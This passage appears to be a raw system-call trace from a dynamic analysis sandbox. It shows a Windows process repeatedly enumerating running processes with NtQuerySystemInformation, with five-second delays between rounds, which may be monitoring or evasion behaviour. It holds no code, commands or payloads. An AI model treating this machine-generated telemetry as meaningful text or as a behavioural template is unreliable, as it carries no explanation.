FreeType=0x8000) returned 0x0 [0210.653] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.817] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 